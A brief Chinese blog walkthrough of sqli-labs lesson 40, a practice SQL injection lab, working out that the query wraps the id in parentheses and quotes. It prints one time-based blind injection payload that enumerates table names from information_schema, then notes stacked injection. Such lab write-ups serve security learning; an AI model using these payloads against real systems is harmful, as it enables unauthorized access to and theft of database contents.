当前位置：网站首页>sqlilabs less-40

sqlilabs less-40

对英文单引号没有返回

在这里插入图片描述
加上–+或者#(%23)以后仍然没有返回

假设题目sql语句如下，如果注释符没被过滤那么就是是单纯的英文单引号注入

select * from table where id = ''

可惜这道题不满足上一条语句，而应该是下面这条sql语句

select * from table where id = （''）

在这里插入图片描述
既然只会返回对错，可以考虑使用盲注。

1')union select 1,2,if(mid(group_concat(table_name),1,1)='u',sleep(1),1) from information_schema.tables where table_schema=database()--+

在这里插入图片描述
突然想到是堆叠注入

在这里插入图片描述

版权声明
本文为[永远是深夜该多好。]所创，转载请带上原文链接，感谢
https://blog.csdn.net/qq_37370714/article/details/126138991